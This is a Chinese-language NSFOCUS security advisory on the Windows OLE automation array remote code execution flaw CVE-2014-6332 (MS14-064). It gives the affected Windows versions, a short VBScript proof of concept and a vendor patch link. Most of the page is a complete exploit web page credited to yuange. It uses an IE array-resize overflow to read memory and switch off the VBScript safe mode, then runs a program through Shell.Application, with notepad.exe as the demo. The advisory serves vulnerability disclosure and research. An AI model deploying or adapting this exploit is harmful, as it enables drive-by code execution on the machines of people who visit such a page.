NSFOCUS绿盟科技

首页 -> 安全研究

安全研究

安全漏洞

Microsoft Windows OLE远程代码执行漏洞(CVE-2014-6332)(MS14-064)

发布日期：2014-11-11
更新日期：2014-11-14

受影响系统：

Microsoft Windows Windows Vista SP2
Microsoft Windows Vista SP2
Microsoft Windows Server 2012 R2
Microsoft Windows Server 2008 SP2
Microsoft Windows Server 2003 SP2
Microsoft Windows RT 8.1
Microsoft Windows RT
Microsoft Windows 8.1
Microsoft Windows 8

描述：

BUGTRAQ  ID: 70952
CVE(CAN) ID: CVE-2014-6332

OLE（对象链接与嵌入）是一种允许应用程序共享数据和功能的技术。

Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2/R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold/R2, Windows RT Gold/8.1版本在实现上存在Windows OLE自动化数组远程代码执行漏洞，远程攻击者利用此漏洞通过构造的网站执行任意代码。

<*来源：Robert Freeman

  链接：http://technet.microsoft.com/security/bulletin/MS14-064
*>

测试方法：

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

IE环境下该漏洞的POC代码如下

==================================================================================

function test()
    On Error Resume Next
    Dim X()
    Dim oldArrayNum,newArrayNum

    oldArrayNum = 4
    newArrayNum = 134217728+oldArrayNum

    Redim X(oldArrayNum)                // SafeArraySize = hex( (num+1)*0x10 )
    ReDim Preserve X(newArrayNum)

    X(10) = 10

end function

==================================================================================

该漏洞的另外一个独立发现者@yuange1975公布的利用演示代码如下

==================================================================================

<!doctype html>
<html>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
<head>
<p>
//*
   allie(win95+ie3-win10+ie11) dve copy by yuange in 2009.
   https://twitter.com/yuange75
   http://hi.baidu.com/yuange1975

*//
</p>
</head>
<body>

<SCRIPT LANGUAGE="VBScript">

function runmumaa()
On Error Resume Next
set shell=createobject("Shell.Application")
shell.ShellExecute "notepad.exe"
end function

</script>

<SCRIPT LANGUAGE="VBScript">

dim   aa()
dim   ab()
dim   a0
dim   a1
dim   a2
dim   a3
dim   win9x
dim   intVersion
dim   rnda
dim   funclass
dim   myarray

Begin()

function Begin()
  On Error Resume Next
  info=Navigator.UserAgent

  if(instr(info,"Win64")>0)   then
     exit   function
  end if

  if (instr(info,"MSIE")>0)   then
             intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))
  else
     exit   function

  end if

  win9x=0

  BeginInit()
  If Create()=True Then
     myarray=        chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
     myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)

     if(intVersion<4) then
         document.write("<br> IE")
         document.write(intVersion)
         runshellcode()
     else
          setnotsafemode()
     end if
  end if
end function

function BeginInit()
   Randomize()
   redim aa(5)
   redim ab(5)
   a0=13+17*rnd(6)
   a3=7+3*rnd(5)
end function

function Create()
  On Error Resume Next
  dim i
  Create=False
  For i = 0 To 400
    If Over()=True Then
    '   document.write(i)
       Create=True
       Exit For
    End If
  Next
end function

sub testaa()
end sub

function mydata()
    On Error Resume Next
     i=testaa
     i=null
     redim  Preserve aa(a2)

     ab(0)=0
     aa(a1)=i
     ab(0)=6.36598737437801E-314

     aa(a1+2)=myarray
     ab(2)=1.74088534731324E-310
     mydata=aa(a1)
     redim  Preserve aa(a0)
end function

function setnotsafemode()
    On Error Resume Next
    i=mydata()
    i=readmemo(i+8)
    i=readmemo(i+16)
    j=readmemo(i+&h134)
    for k=0 to &h60 step 4
        j=readmemo(i+&h120+k)
        if(j=14) then
              j=0
              redim  Preserve aa(a2)
              aa(a1+2)(i+&h11c+k)=ab(4)
              redim  Preserve aa(a0)

              j=0
              j=readmemo(i+&h120+k)

               Exit for
           end if

    next
    ab(2)=1.69759663316747E-313
    runmumaa()
end function

function Over()
    On Error Resume Next
    dim type1,type2,type3
    Over=False
    a0=a0+a3
    a1=a0+2
    a2=a0+&h8000000

    redim  Preserve aa(a0)
    redim   ab(a0)

    redim  Preserve aa(a2)

    type1=1
    ab(0)=1.123456789012345678901234567890
    aa(a0)=10

    If(IsObject(aa(a1-1)) = False) Then
       if(intVersion<4) then
           mem=cint(a0+1)*16
           j=vartype(aa(a1-1))
           if((j=mem+4) or (j*8=mem+8)) then
              if(vartype(aa(a1-1))<>0)  Then
                 If(IsObject(aa(a1)) = False ) Then
                   type1=VarType(aa(a1))
                 end if
              end if
           else
             redim  Preserve aa(a0)
             exit  function

           end if
        else
           if(vartype(aa(a1-1))<>0)  Then
              If(IsObject(aa(a1)) = False ) Then
                  type1=VarType(aa(a1))
              end if
            end if
        end if
    end if


    If(type1=&h2f66) Then
          Over=True
    End If
    If(type1=&hB9AD) Then
          Over=True
          win9x=1
    End If

    redim  Preserve aa(a0)

end function

function ReadMemo(add)
    On Error Resume Next
    redim  Preserve aa(a2)

    ab(0)=0
    aa(a1)=add+4
    ab(0)=1.69759663316747E-313
    ReadMemo=lenb(aa(a1))

    ab(0)=0

    redim  Preserve aa(a0)
end function

</script>

</body>
</html>

==================================================================================

建议：

厂商补丁：

Microsoft
---------
Microsoft已经为此发布了一个安全公告（MS14-064）以及相应补丁:
MS14-064：Vulnerabilities in Windows OLE Could Allow Remote Code Execution
链接：http://technet.microsoft.com/security/bulletin/MS14-064

浏览次数：5106
严重程度：0（网友投票）

关于我们: 公司介绍; 公司荣誉; 公司新闻

联系我们: 公司总部; 分支机构; 海外机构

快速链接: 绿盟云; 绿盟威胁情报中心NTI; 技术博客